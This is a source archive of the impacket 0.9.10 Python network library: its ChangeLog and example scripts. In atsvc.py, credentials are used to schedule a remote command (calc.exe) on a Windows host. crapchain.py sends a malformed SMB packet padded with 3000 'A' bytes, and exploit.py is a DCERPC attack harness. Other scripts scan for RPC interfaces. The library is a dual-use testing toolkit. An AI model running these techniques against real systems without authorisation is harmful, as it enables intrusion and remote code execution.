impacket-0.9.10/0000700000076500000240000000000012141751750013443 5ustar betostaff00000000000000impacket-0.9.10/ChangeLog0000600000076500000240000000506512141750576015232 0ustar betostaff00000000000000Complete list of changes can be found at: http://code.google.com/p/impacket/source/list 2009-11-08 gmoreira Added WEP Encryption/Decryption 2009-06-04 gera added class PcapFile. it can be used to read and write pcap files 2009-06-04 gmoreira Added partial support for IEEE 802.11 Network packet codecs 2008-08-01 gera Added patch to TCP.get_echo_ts() submited by Tim Coote 2006-10-23 * impacket/dcerpc/samr.py: fixed bug in display_time (reported by grutz _at_ jingojango.net) 2006-09-25 * setup.py: fixed bug where some doc files were installed on usr/bin (reported by jheath _at_ sourcefire.com) 2006-06-23 * impacket/ImpactPacket.py: fixed bug in TCP.get_th_sum() (reported by ranusy _at_ gmail.com) 2006-04-03 * impacket/ImpactPacket.py: applied patch to fix bug when parsing ARP packets. * impacket/ImpactPacket.py: fixed byte ordering bug when using IP_HDRINCL in BSD systems (patch supplied by ginga _at_ ginganet.org). 2005-07-28 * impacket/ImpactDecoder.py: fixed a bug when processing ICMP unreachables. * impacket/ImpactPacket.py: fixed bug in the set_icmp_nextmtu() method (reported by icbm _at_ 0x557.org). 2004-02-26 * impacket/ImpactPacket.py (ARP.as_pro): Fixed as_{hrd,pro} methods to not invoke the tolist method, because they were being called with array objects as input, and anyway it wasn't necessary to call that method for what they did. 2003-12-16 * setup.py: Bumped version number to 0.9.5.1. * impacket/dcerpc/dcerpc_v4.py (DCERPC_v4.send): fixed a problem in the fragmentation code caused by a misindented line that was introduced in the last release. 2003-12-10 Javier Kohen * impacket/dcerpc/dcerpc_v4.py (DCERPC_v4.bind): support idempotent flag. (DCERPC_v4.send): reduced fragment size to avoid IP fragmentation on links with MTU = 1500. Added a method that allows the caller to configure this size. 2003-12-02 * impacket/dcerpc/dcerpc_v4.py (DCERPC_v4.bind): made self.__bind protected (DCERPC_v4.send): fragment outgoing packets. 2003-12-01 * setup.py: Force linking with G++ if GCC was found, to avoid a missing symbol on some configurations. 2003-11-28 * impacket/dcerpc/dcerpc_v4.py: Fixed self.bind variable having the same name than a method. impacket-0.9.10/examples/0000700000076500000240000000000012141751750015261 5ustar betostaff00000000000000impacket-0.9.10/examples/atsvc.py0000600000076500000240000001100112141750576016753 0ustar betostaff00000000000000#!/usr/bin/python # Copyright (c) 2003-2012 CORE Security Technologies # # This software is provided under under a slightly modified version # of the Apache Software License. See the accompanying LICENSE file # for more information. # # $Id: atsvc.py 558 2012-05-22 13:56:36Z bethus@gmail.com $ # # ATSVC example for some functions implemented # # Author: # Alberto Solino (bethus@gmail.com) # # Reference for: # DCE/RPC for ATSVC import socket import string import sys import types from impacket import uuid, ntlm from impacket.dcerpc import dcerpc_v4, dcerpc, transport, ndrutils, atsvc from struct import unpack class ATSVC: KNOWN_PROTOCOLS = { '139/SMB': (r'ncacn_np:%s[\pipe\atsvc]', 139), '445/SMB': (r'ncacn_np:%s[\pipe\atsvc]', 445), } def __init__(self, protocols = None, username = '', password = ''): if not protocols: protocols = ATSVC.KNOWN_PROTOCOLS.keys() self.__username = username self.__password = password self.__protocols = protocols def play(self, addr): # Try all requested protocols until one works. entries = [] for protocol in self.__protocols: protodef = ATSVC.KNOWN_PROTOCOLS[protocol] port = protodef[1] print "Trying protocol %s..." % protocol stringbinding = protodef[0] % addr rpctransport = transport.DCERPCTransportFactory(stringbinding) rpctransport.set_dport(port) if hasattr(rpctransport, 'set_credentials'): # This method exists only for selected protocol sequences. rpctransport.set_credentials(self.__username, self.__password) try: entries = self.doStuff(rpctransport) except Exception, e: print 'Protocol failed: %s' % e else: # Got a response. No need for further iterations. break def doStuff(self, rpctransport): dce = dcerpc.DCERPC_v5(rpctransport) user, pwd, domain, _, _ = rpctransport.get_credentials() dce.set_credentials(user,pwd,domain) dce.connect() #dce.set_auth_level(ntlm.NTLM_AUTH_PKT_PRIVACY) #dce.set_max_fragment_size(16) dce.bind(atsvc.MSRPC_UUID_ATSVC) at = atsvc.DCERPCAtSvc(dce) # Check [MS-TSCH] Section 2.3.4 atInfo = atsvc.AT_INFO() atInfo['JobTime'] = 0 atInfo['DaysOfMonth'] = 0 atInfo['DaysOfWeek'] = 0 atInfo['Flags'] = 0 atInfo['Command'] = ndrutils.NDRUniqueStringW() atInfo['Command']['Data'] = ('calc.exe\x00').encode('utf-16le') # Remember to remove it on the target server ;) resp = at.NetrJobAdd(('\\\\%s'% rpctransport.get_dip()),atInfo) resp = at.NetrJobEnum(rpctransport.get_dip()) # ToDo: Parse this struct, should be easy resp.dump() # Switching context to TSS dce = dce.alter_ctx(atsvc.MSRPC_UUID_TSS) # Now atsvc should use that new context at = atsvc.DCERPCAtSvc(dce) #path = '\\Microsoft\\Windows\\Media Center' path = '\\' resp = at.SchRpcEnumTasks(path) if resp['Count'] == 1: print resp['TaskName']['Data'] if resp['ErrorCode'] == atsvc.S_FALSE: i = 1 done = False while done is not True: # More items try: resp = at.SchRpcEnumTasks(path,startIndex=i) except: break if resp['Count'] == 1: print resp['TaskName']['Data'] i += 1 elif resp['ErrorCode'] != atsvc.S_FALSE: done = True dce.disconnect() # Process command-line arguments. if __name__ == '__main__': if len(sys.argv) <= 1: print "Usage: %s [username[:password]@]
[protocol list...]" % sys.argv[0] print "Available protocols: %s" % ATSVC.KNOWN_PROTOCOLS.keys() print "Username and password are only required for certain transports, eg. SMB." sys.exit(1) import re username, password, address = re.compile('(?:([^@:]*)(?::([^@]*))?@)?(.*)').match(sys.argv[1]).groups('') if len(sys.argv) > 2: dumper = ATSVC(sys.argv[2:], username, password) else: dumper = ATSVC(username = username, password = password) dumper.play(address) impacket-0.9.10/examples/chain.py0000600000076500000240000000503212141750576016724 0ustar betostaff00000000000000from impacket import smb import os class lotsSMB(smb.SMB): def do_lots(self, user, pwd_ansi, share, filename, domain = ''): pkt = smb.NewSMBPacket() pkt['Flags1'] = 8 sessionSetup = smb.SMBCommand(self.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Parameters() sessionSetup['Data'] = smb.SMBSessionSetupAndX_Data() sessionSetup['Parameters']['MaxBuffer'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VCNumber'] = os.getpid() sessionSetup['Parameters']['SessionKey'] = self.get_session_key() sessionSetup['Parameters']['AnsiPwdLength'] = len(pwd_ansi) sessionSetup['Parameters']['UnicodePwdLength'] = len('') sessionSetup['Parameters']['Capabilities'] = self.CAP_RAW_MODE sessionSetup['Data']['AnsiPwd'] = pwd_ansi sessionSetup['Data']['UnicodePwd'] = '' sessionSetup['Data']['Account'] = str(user) sessionSetup['Data']['PrimaryDomain'] = str(domain) sessionSetup['Data']['NativeOS'] = str(os.name) sessionSetup['Data']['NativeLanMan'] = 'pysmb' # This is an example of how to use chained ANDX commands treeConnect = smb.SMBCommand(self.SMB_COM_TREE_CONNECT_ANDX) treeConnect['Parameters'] = smb.SMBTreeConnectAndX_Parameters() treeConnect['Data'] = smb.SMBTreeConnectAndX_Data() treeConnect['Parameters']['PasswordLength'] = 1 treeConnect['Data']['Password'] = '\x00' treeConnect['Data']['Path'] = share treeConnect['Data']['Service'] = smb.SERVICE_ANY openFile = smb.SMBCommand(self.SMB_COM_OPEN_ANDX) openFile['Parameters'] = smb.SMBOpenAndX_Parameters() openFile['Parameters']['DesiredAccess'] = smb.SMB_ACCESS_READ openFile['Parameters']['OpenMode'] = smb.SMB_O_OPEN openFile['Parameters']['SearchAttributes'] = 0 openFile['Data'] = smb.SMBOpenAndX_Data() openFile['Data']['FileName'] = filename readAndX = smb.SMBCommand(self.SMB_COM_READ_ANDX) readAndX['Parameters'] = smb.SMBReadAndX_Parameters() readAndX['Parameters']['Offset'] = 0 readAndX['Parameters']['Fid'] = 0 readAndX['Parameters']['MaxCount'] = 4000 pkt.addCommand(sessionSetup) pkt.addCommand(treeConnect) pkt.addCommand(openFile) pkt.addCommand(readAndX) # This is an example of how to make a loop with the chained commands # treeConnect['Parameters']['AndXCommand'] = self.SMB_COM_TREE_CONNECT_ANDX # treeConnect['Parameters']['AndXOffset'] = 72 self.sendSMB(pkt) pkt = self.recvSMB() s = lotsSMB('*SMBSERVER','192.168.1.1') s.do_lots('Administrator','password', r'\\*SMBSERVER\C$', r'\gera') impacket-0.9.10/examples/crapchain.py0000600000076500000240000000530512141750576017575 0ustar betostaff00000000000000from impacket import smb import os class lotsSMB(smb.SMB): def do_lots(self, user, pwd_ansi, share, filename, domain = ''): pkt = smb.NewSMBPacket() pkt['Flags1'] = 8 sessionSetup = smb.SMBCommand(self.SMB_COM_SESSION_SETUP_ANDX) sessionSetup['Parameters'] = smb.SMBSessionSetupAndX_Parameters() sessionSetup['Data'] = smb.SMBSessionSetupAndX_Data() sessionSetup['Parameters']['MaxBuffer'] = 65535 sessionSetup['Parameters']['MaxMpxCount'] = 2 sessionSetup['Parameters']['VCNumber'] = os.getpid() sessionSetup['Parameters']['SessionKey'] = self.get_session_key() sessionSetup['Parameters']['AnsiPwdLength'] = len(pwd_ansi) sessionSetup['Parameters']['UnicodePwdLength'] = len('') sessionSetup['Parameters']['Capabilities'] = self.CAP_RAW_MODE sessionSetup['Data']['AnsiPwd'] = pwd_ansi sessionSetup['Data']['UnicodePwd'] = '' sessionSetup['Data']['Account'] = str(user) sessionSetup['Data']['PrimaryDomain'] = str(domain) sessionSetup['Data']['NativeOS'] = str(os.name) sessionSetup['Data']['NativeLanMan'] = 'pysmb' # This is an example of how to use chained ANDX commands treeConnect = smb.SMBCommand(self.SMB_COM_TREE_CONNECT_ANDX) treeConnect['Parameters'] = smb.SMBTreeConnectAndX_Parameters() treeConnect['Data'] = smb.SMBTreeConnectAndX_Data() treeConnect['Parameters']['PasswordLength'] = 1 treeConnect['Data']['Password'] = '\x00' treeConnect['Data']['Path'] = share treeConnect['Data']['Service'] = smb.SERVICE_ANY openFile = smb.SMBCommand(self.SMB_COM_OPEN_ANDX) openFile['Parameters'] = smb.SMBOpenAndX_Parameters() openFile['Parameters']['DesiredAccess'] = smb.SMB_ACCESS_READ openFile['Parameters']['OpenMode'] = smb.SMB_O_OPEN openFile['Parameters']['SearchAttributes'] = 0 openFile['Data'] = smb.SMBOpenAndX_Data() openFile['Data']['FileName'] = filename readAndX = smb.SMBCommand(self.SMB_COM_READ_ANDX) readAndX['Parameters'] = smb.SMBReadAndX_Parameters() readAndX['Parameters']['Offset'] = 0 readAndX['Parameters']['Fid'] = 0 readAndX['Parameters']['MaxCount'] = 4000 crap = smb.SMBCommand(0) crap['Parameters'] = smb.SMBAndXCommand_Parameters() crap['Data'] = 'A'*3000 pkt.addCommand(sessionSetup) pkt.addCommand(crap) pkt.addCommand(treeConnect) pkt.addCommand(openFile) pkt.addCommand(readAndX) sessionSetup['Parameters']['AndXCommand'] = crap['Parameters']['AndXCommand'] sessionSetup['Parameters']['AndXOffset'] = crap['Parameters']['AndXOffset'] sessionSetup['ByteCount'] = 1000 treeConnect['ByteCount'] = 100 self.sendSMB(pkt) pkt = self.recvSMB() s = lotsSMB('*SMBSERVER','192.168.1.1') s.do_lots('Administrator','password', r'\\*SMBSERVER\C$', r'\gera') impacket-0.9.10/examples/exploit.py0000600000076500000240000001362512141750576017335 0ustar betostaff00000000000000from impacket.dcerpc import transport from impacket import uuid, smb import random class DCERPCExploit: params = { # general options 'host': '192.168.1.1', 'pipe': 'browser', 'port': 139, 'proto': 1, # 0 UDP, 1 SMB # SMB options 'tree_connect': 0, # 0 = tree_connect, 1 = tree_connect_andx 'open': 0, # 0 = open, 1 = open_andx, 2 = nt_create_andx 'read': 0, # 0 = read, 1 = read_andx, 2 = read_raw, 3 = read_cycling 'write': 0, # 0 = write, 1 = write_andx, 2 = write_raw, 3 = write_cycling 'transport_frag': -1, # -1 = don't fragment, use TransactNamedPipe. 'random_offsets': 0, # randomize offset in write and read requests (when cycling) 'smb_user': '', 'smb_passwd': '', 'smb_lmhash': '', # lm_hash, first part of pwdump3 output, On of the hashes is enough 'smb_nthash': '', # nt_hash, second part of pwdump3 output # DCERPC options 'idempotent': 0, # 'dcerpc_frag': -1, # -1 - don't fragment 'alter_ctx': 0, # use alter_ctx instead of bind(). Will issue a bogus bind first 'bogus_binds': 0, # number of bogus UUIDs in bind() request 'bogus_alter': 0, # number of bogus UUIDs in alter_ctx(), implies alter_ctx 'endianness': '<', # < for little endian, > for big endian # When switching to big endian you also need to change the # endianness of the parameters to the function (in dce.call()) # Structure does not currently have decent support for this, # specially for the 'w' fields. } UUID = ('01010101-2323-4545-6767-898989898989','1.0') BOGUS_UUID = ('12341234-5678-5678-5678-1234567890ab','1.0') def __init__(self, argv): for arg in argv: args = arg.split('=',2) if len(args) != 2: self.usage() raise Exception, "Error parsing argument %r" % arg if len(args) == 1: continue self.params[args[0]] = args[1] self.WRITE_TYPE = 0 self.READ_TYPE = 0 protocols = ( 'ncadg_ip_udp:%(host)s[%(port)d]', 'ncacn_np:%(host)s[\\pipe\\%(pipe)s]', ) def run(self): self.setupConnection() self.attackRun() def open(self, *args): args = list(args) args[1] = r'\\pipe%s' % args[1] args.append(smb.SMB_O_CREAT) args.append(smb.SMB_ACCESS_WRITE | smb.SMB_ACCESS_READ) return self.smb.open(*args)[0] def open_andx(self, *args): args = list(args) args[1] = r'\\pipe%s' % args[1] args.append(smb.SMB_O_CREAT) args.append(smb.SMB_ACCESS_WRITE | smb.SMB_ACCESS_READ) return self.smb.open_andx(*args)[0] def write_cycling(self, *args, **kargs): w = (self.smb.write, self.smb.original_write_andx, self.smb.write_raw)[self.WRITE_TYPE] self.WRITE_TYPE += 1 self.WRITE_TYPE %= 3 if int(self.params['random_offsets']): kargs['offset'] = random.randint(0,65535) return w(*args, **kargs) def read_cycling(self, *args, **kargs): w = (self.smb.read, self.smb.original_read_andx, self.smb.read_raw)[self.READ_TYPE] self.READ_TYPE += 1 self.READ_TYPE %= 3 if int(self.params['random_offsets']): kargs['offset'] = random.randint(0,65535) return w(*args, **kargs) def setupConnection(self): proto = int(self.params['proto']) self.params['port'] = int(self.params['port']) stringbinding = self.protocols[proto] stringbinding %= self.params print "Using stringbinding: %r" % stringbinding self.trans = transport.DCERPCTransportFactory(stringbinding) self.trans.set_max_fragment_size(int(self.params['transport_frag'])) self.trans.set_dport(int(self.params['port'])) try: # SMB parameters handling self.trans.setup_smb_server() # force building the SMB object so we can change its methods self.smb = self.trans.get_smb_server() # select the right tree_connect arg = int(self.params['tree_connect']) if arg == 0: self.smb.tree_connect_andx = self.smb.tree_connect if arg == 1: self.smb.tree_connect_andx = self.smb.tree_connect_andx # open selection arg = int(self.params['open']) if arg == 0: self.smb.nt_create_andx = self.open elif arg == 1: self.smb.nt_create_andx = self.open_andx # read selection arg = int(self.params['read']) if arg == 0: self.smb.read_andx = self.smb.read elif arg == 1: self.smb.read_andx = self.smb.read_andx elif arg == 2: self.smb.read_andx = self.smb.read_raw elif arg == 3: self.smb.original_read_andx = self.smb.read_andx self.smb.read_andx = self.read_cycling # write selection arg = int(self.params['write']) if arg == 0: self.smb.write_andx = self.smb.write elif arg == 1: self.smb.write_andx = self.smb.write_andx elif arg == 2: self.smb.write_andx = self.smb.write_raw elif arg == 3: self.smb.original_write_andx = self.smb.write_andx self.smb.write_andx = self.write_cycling # smb credentials self.trans.set_credentials( self.params['smb_user'], self.params['smb_passwd'], lm_hash = self.params['smb_lmhash'], nt_hash = self.params['smb_nthash']) except Exception, e: pass self.trans.connect() self.dce = self.trans.DCERPC_class(self.trans) self.dce.endianness = self.params['endianness'] # DCERPC parameters handling self.dce.set_max_fragment_size(int(self.params['dcerpc_frag'])) self.dce.set_idempotent(int(self.params['idempotent'])) # alter_ctx alter = int(self.params['alter_ctx']) or int(self.params['bogus_alter']) if alter: _uuid = self.BOGUS_UUID else: _uuid = self.UUID # bogus_binds self.dce.bind(uuid.uuidtup_to_bin(_uuid), bogus_binds = int(self.params['bogus_binds'])) if proto and alter: self.dce = self.dce.alter_ctx(uuid.uuidtup_to_bin(self.UUID), bogus_binds = int(self.params['bogus_alter'])) def usage(self): print "Use: python example.py param1=value param2=value2 ..." print "see exploit.py to see al available parameters" print "for example:\n" print "$ python example.py host=192.168.1.1 transport_frag=10" def attackRun(self): pass impacket-0.9.10/examples/ifmap.py0000600000076500000240000003250612141750576016744 0ustar betostaff00000000000000#!/usr/bin/python """ifmap - scan for listening DCERPC interfaces Usage: ifmap.py hostname port First, this binds to the MGMT interface and gets a list of interface IDs. It adds to this a large list of interface UUIDs seen in the wild. It then tries to bind to each interface and reports whether the interface is listed and/or listening. This will generate a burst of TCP connections to the given host:port! Example: $ ./ifmap.py 10.0.0.30 135 ('00000136-0000-0000-C000-000000000046', '0.0'): listed, listening ('000001A0-0000-0000-C000-000000000046', '0.0'): listed, listening ('0B0A6584-9E0F-11CF-A3CF-00805F68CB1B', '1.0'): other version listed, listening ('0B0A6584-9E0F-11CF-A3CF-00805F68CB1B', '1.1'): listed, listening ('1D55B526-C137-46C5-AB79-638F2A68E869', '1.0'): listed, listening ('412F241E-C12A-11CE-ABFF-0020AF6E7A17', '0.0'): other version listed, listening ('412F241E-C12A-11CE-ABFF-0020AF6E7A17', '0.2'): listed, listening ('4D9F4AB8-7D1C-11CF-861E-0020AF6E7C57', '0.0'): listed, listening ('99FCFEC4-5260-101B-BBCB-00AA0021347A', '0.0'): listed, listening ('AFA8BD80-7D8A-11C9-BEF4-08002B102989', '1.0'): not listed, listening ('B9E79E60-3D52-11CE-AAA1-00006901293F', '0.0'): other version listed, listening ('B9E79E60-3D52-11CE-AAA1-00006901293F', '0.2'): listed, listening ('C6F3EE72-CE7E-11D1-B71E-00C04FC3111A', '1.0'): listed, listening ('E1AF8308-5D1F-11C9-91A4-08002B14A0FA', '3.0'): listed, listening ('E60C73E6-88F9-11CF-9AF1-0020AF6E72F4', '2.0'): listed, listening Usually, only AFA8BD80-...-89, the MGMT interface, is not listed but always listening on any port. This is imposed by the DCERPC spec. Author: Catalin Patulea """ import sys, struct from impacket import uuid from impacket.dcerpc import transport, dcerpc, dcerpc_v4, ndrutils from impacket.dcerpc import mgmt uuid_database = set(uuid.string_to_uuidtup(line) for line in """ 00000001-0000-0000-c000-000000000046 v0.0 00000131-0000-0000-c000-000000000046 v0.0 00000132-0000-0000-c000-000000000046 v0.0 00000134-0000-0000-c000-000000000046 v0.0 00000136-0000-0000-c000-000000000046 v0.0 00000141-0000-0000-c000-000000000046 v0.0 00000143-0000-0000-c000-000000000046 v0.0 000001a0-0000-0000-c000-000000000046 v0.0 027947e1-d731-11ce-a357-000000000001 v0.0 04fcb220-fcfd-11cd-bec8-00aa0047ae4e v1.0 06bba54a-be05-49f9-b0a0-30f790261023 v1.0 0767a036-0d22-48aa-ba69-b619480f38cb v1.0 0a5a5830-58e0-11ce-a3cc-00aa00607271 v1.0 0a74ef1c-41a4-4e06-83ae-dc74fb1cdd53 v1.0 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b v1.0 0b0a6584-9e0f-11cf-a3cf-00805f68cb1b v1.1 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1 v1.0 0c821d64-a3fc-11d1-bb7a-0080c75e4ec1 v1.0 0d72a7d4-6148-11d1-b4aa-00c04fb66ea0 v1.0 0da5a86c-12c2-4943-30ab-7f74a813d853 v1.0 0e4a0156-dd5d-11d2-8c2f-00c04fb6bcde v1.0 1088a980-eae5-11d0-8d9b-00a02453c337 v1.0 10f24e8e-0fa6-11d2-a910-00c04f990f3b v1.0 11220835-5b26-4d94-ae86-c3e475a809de v1.0 12345678-1234-abcd-ef00-0123456789ab v1.0 12345678-1234-abcd-ef00-01234567cffb v1.0 12345778-1234-abcd-ef00-0123456789ab v0.0 12345778-1234-abcd-ef00-0123456789ac v1.0 12b81e99-f207-4a4c-85d3-77b42f76fd14 v1.0 12d4b7c8-77d5-11d1-8c24-00c04fa3080d v1.0 12e65dd8-887f-41ef-91bf-8d816c42c2e7 v1.0 130ceefb-e466-11d1-b78b-00c04fa32883 v2.0 1453c42c-0fa6-11d2-a910-00c04f990f3b v1.0 1544f5e0-613c-11d1-93df-00c04fd7bd09 v1.0 16e0cf3a-a604-11d0-96b1-00a0c91ece30 v1.0 16e0cf3a-a604-11d0-96b1-00a0c91ece30 v2.0 17fdd703-1827-4e34-79d4-24a55c53bb37 v1.0 18f70770-8e64-11cf-9af1-0020af6e72f4 v0.0 1a9134dd-7b39-45ba-ad88-44d01ca47f28 v1.0 1bddb2a6-c0c3-41be-8703-ddbdf4f0e80a v1.0 1be617c0-31a5-11cf-a7d8-00805f48a135 v3.0 1c1c45ee-4395-11d2-b60b-00104b703efd v0.0 1cbcad78-df0b-4934-b558-87839ea501c9 v0.0 1d55b526-c137-46c5-ab79-638f2a68e869 v1.0 1ff70682-0a51-30e8-076d-740be8cee98b v1.0 201ef99a-7fa0-444c-9399-19ba84f12a1a v1.0 20610036-fa22-11cf-9823-00a0c911e5df v1.0 209bb240-b919-11d1-bbb6-0080c75e4ec1 v1.0 21cd80a2-b305-4f37-9d4c-4534a8d9b568 v0.0 2465e9e0-a873-11d0-930b-00a0c90ab17c v3.0 25952c5d-7976-4aa1-a3cb-c35f7ae79d1b v1.0 266f33b4-c7c1-4bd1-8f52-ddb8f2214ea9 v1.0 28607ff1-15a0-8e03-d670-b89eec8eb047 v1.0 2acb9d68-b434-4b3e-b966-e06b4b3a84cb v1.0 2eb08e3e-639f-4fba-97b1-14f878961076 v1.0 2f59a331-bf7d-48cb-9e5c-7c090d76e8b8 v1.0 2f5f3220-c126-1076-b549-074d078619da v1.2 2f5f6520-ca46-1067-b319-00dd010662da v1.0 2f5f6521-ca47-1068-b319-00dd010662db v1.0 2f5f6521-cb55-1059-b446-00df0bce31db v1.0 2fb92682-6599-42dc-ae13-bd2ca89bd11c v1.0 300f3532-38cc-11d0-a3f0-0020af6b0add v1.2 326731e3-c1c0-4a69-ae20-7d9044a4ea5c v1.0 333a2276-0000-0000-0d00-00809c000000 v3.0 338cd001-2244-31f1-aaaa-900038001003 v1.0 342cfd40-3c6c-11ce-a893-08002b2e9c6d v0.0 3473dd4d-2e88-4006-9cba-22570909dd10 v5.0 3473dd4d-2e88-4006-9cba-22570909dd10 v5.1 359e47c9-682e-11d0-adec-00c04fc2a078 v1.0 367abb81-9844-35f1-ad32-98f038001003 v2.0 369ce4f0-0fdc-11d3-bde8-00c04f8eee78 v1.0 378e52b0-c0a9-11cf-822d-00aa0051e40f v1.0 386ffca4-22f5-4464-b660-be08692d7296 v1.0 38a94e72-a9bc-11d2-8faf-00c04fa378ff v1.0 3919286a-b10c-11d0-9ba8-00c04fd92ef5 v0.0 3ba0ffc0-93fc-11d0-a4ec-00a0c9062910 v1.0 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d5 v1.0 3c4728c5-f0ab-448b-bda1-6ce01eb0a6d6 v1.0 3dde7c30-165d-11d1-ab8f-00805f14db40 v1.0 3f31c91e-2545-4b7b-9311-9529e8bffef6 v1.0 3f77b086-3a17-11d3-9166-00c04f688e28 v1.0 3f99b900-4d87-101b-99b7-aa0004007f07 v1.0 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 v1.0 3faf4738-3a21-4307-b46c-fdda9bb8c0d5 v1.1 41208ee0-e970-11d1-9b9e-00e02c064c39 v1.0 412f241e-c12a-11ce-abff-0020af6e7a17 v0.2 423ec01e-2e35-11d2-b604-00104b703efd v0.0 45776b01-5956-4485-9f80-f428f7d60129 v2.0 45f52c28-7f9f-101a-b52b-08002b2efabe v1.0 469d6ec0-0d87-11ce-b13f-00aa003bac6c v16.0 4825ea41-51e3-4c2a-8406-8f2d2698395f v1.0 4a452661-8290-4b36-8fbe-7f4093a94978 v1.0 4b112204-0e19-11d3-b42b-0000f81feb9f v1.0 4b324fc8-1670-01d3-1278-5a47bf6ee188 v0.0 4b324fc8-1670-01d3-1278-5a47bf6ee188 v3.0 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57 v0.0 4da1c422-943d-11d1-acae-00c04fc2aa3f v1.0 4f82f460-0e21-11cf-909e-00805f48a135 v4.0 4fc742e0-4a10-11cf-8273-00aa004ae673 v3.0 50abc2a4-574d-40b3-9d66-ee4fd5fba076 v5.0 53e75790-d96b-11cd-ba18-08002b2dfead v2.0 56c8504c-4408-40fd-93fc-afd30f10c90d v1.0 57674cd0-5200-11ce-a897-08002b2e9c6d v0.0 57674cd0-5200-11ce-a897-08002b2e9c6d v1.0 5a7b91f8-ff00-11d0-a9b2-00c04fb6e6fc v1.0 5b5b3580-b0e0-11d1-b92d-0060081e87f0 v1.0 5b821720-f63b-11d0-aad2-00c04fc324db v1.0 5c89f409-09cc-101a-89f3-02608c4d2361 v1.1 5ca4a760-ebb1-11cf-8611-00a0245420ed v1.0 5cbe92cb-f4be-45c9-9fc9-33e73e557b20 v1.0 5f54ce7d-5b79-4175-8584-cb65313a0e98 v1.0 6099fc12-3eff-11d0-abd0-00c04fd91a4e v3.0 621dff68-3c39-4c6c-aae3-e68e2c6503ad v1.0 629b9f66-556c-11d1-8dd2-00aa004abd5e v2.0 629b9f66-556c-11d1-8dd2-00aa004abd5e v3.0 63fbe424-2029-11d1-8db8-00aa004abd5e v1.0 654976df-1498-4056-a15e-cb4e87584bd8 v1.0 65a93890-fab9-43a3-b2a5-1e330ac28f11 v2.0 68dcd486-669e-11d1-ab0c-00c04fc2dcd2 v1.0 68dcd486-669e-11d1-ab0c-00c04fc2dcd2 v2.0 69510fa1-2f99-4eeb-a4ff-af259f0f9749 v1.0 6bffd098-0206-0936-4859-199201201157 v1.0 6bffd098-a112-3610-9833-012892020162 v0.0 6bffd098-a112-3610-9833-46c3f874532d v1.0 6bffd098-a112-3610-9833-46c3f87e345a v1.0 6e17aaa0-1a47-11d1-98bd-0000f875292e v2.0 708cca10-9569-11d1-b2a5-0060977d8118 v1.0 70b51430-b6ca-11d0-b9b9-00a0c922e750 v0.0 76d12b80-3467-11d3-91ff-0090272f9ea3 v1.0 76f226c3-ec14-4325-8a99-6a46348418ae v1.0 76f226c3-ec14-4325-8a99-6a46348418af v1.0 77df7a80-f298-11d0-8358-00a024c480a8 v1.0 7af5bbd0-6063-11d1-ae2a-0080c75e4ec1 v0.2 7c44d7d4-31d5-424c-bd5e-2b3e1f323d22 v1.0 7c857801-7381-11cf-884d-00aa004b2e24 v0.0 7e048d38-ac08-4ff1-8e6b-f35dbab88d4a v1.0 7ea70bcf-48af-4f6a-8968-6a440754d5fa v1.0 7f9d11bf-7fb9-436b-a812-b2d50c5d4c03 v1.0 811109bf-a4e1-11d1-ab54-00a0c91e9b45 v1.0 8174bb16-571b-4c38-8386-1102b449044a v1.0 82273fdc-e32a-18c3-3f78-827929dc23ea v0.0 82980780-4b64-11cf-8809-00a004ff3128 v3.0 82ad4280-036b-11cf-972c-00aa006887b0 v2.0 83d72bf0-0d89-11ce-b13f-00aa003bac6c v6.0 83da7c00-e84f-11d2-9807-00c04f8ec850 v2.0 86d35949-83c9-4044-b424-db363231fd0c v1.0 894de0c0-0d55-11d3-a322-00c04fa321a1 v1.0 89742ace-a9ed-11cf-9c0c-08002be7ae86 v2.0 8c7a6de0-788d-11d0-9edf-444553540000 v2.0 8c7daf44-b6dc-11d1-9a4c-0020af6e7c57 v1.0 8cfb5d70-31a4-11cf-a7d8-00805f48a135 v3.0 8d09b37c-9f3a-4ebb-b0a2-4dee7d6ceae9 v1.0 8d0ffe72-d252-11d0-bf8f-00c04fd9126b v1.0 8d9f4e40-a03d-11ce-8f69-08003e30051b v0.0 8d9f4e40-a03d-11ce-8f69-08003e30051b v1.0 8f09f000-b7ed-11ce-bbd2-00001a181cad v0.0 8fb6d884-2388-11d0-8c35-00c04fda2795 v4.1 906b0ce0-c70b-1067-b317-00dd010662da v1.0 91ae6020-9e3c-11cf-8d7c-00aa00c091be v0.0 92bdb7e4-f28b-46a0-b551-45a52bdd5125 v0.0 93149ca2-973b-11d1-8c39-00c04fb984f9 v0.0 93f5ac6f-1a94-4bc5-8d1b-fd44fc255089 v1.0 9556dc99-828c-11cf-a37e-00aa003240c7 v0.0 95958c94-a424-4055-b62b-b7f4d5c47770 v1.0 975201b0-59ca-11d0-a8d5-00a0c90d8051 v1.0 98fe2c90-a542-11d0-a4ef-00a0c9062910 v1.0 99e64010-b032-11d0-97a4-00c04fd6551d v3.0 99fcfec4-5260-101b-bbcb-00aa0021347a v0.0 9b3195fe-d603-43d1-a0d5-9072d7cde122 v1.0 9b8699ae-0e44-47b1-8e7f-86a461d7ecdc v0.0 9e8ee830-4459-11ce-979b-00aa005ffebe v2.0 a002b3a0-c9b7-11d1-ae88-0080c75e4ec1 v1.0 a00c021c-2be2-11d2-b678-0000f87a8f8e v1.0 a0bc4698-b8d7-4330-a28f-7709e18b6108 v4.0 a2d47257-12f7-4beb-8981-0ebfa935c407 v1.0 a398e520-d59a-4bdd-aa7a-3c1e0303a511 v1.0 a3b749b1-e3d0-4967-a521-124055d1c37d v1.0 a4c2fd60-5210-11d1-8fc2-00a024cb6019 v1.0 a4f1db00-ca47-1067-b31e-00dd010662da v1.0 a4f1db00-ca47-1067-b31f-00dd010662da v0.0 a4f1db00-ca47-1067-b31f-00dd010662da v0.81 aa177641-fc9b-41bd-80ff-f964a701596f v1.0 aa411582-9bdf-48fb-b42b-faa1eee33949 v1.0 aae9ac90-ce13-11cf-919e-08002be23c64 v1.0 ae33069b-a2a8-46ee-a235-ddfd339be281 v1.0 afa8bd80-7d8a-11c9-bef4-08002b102989 v1.0 b196b284-bab4-101a-b69c-00aa00341d07 v0.0 b196b286-bab4-101a-b69c-00aa00341d07 v0.0 b58aa02e-2884-4e97-8176-4ee06d794184 v1.0 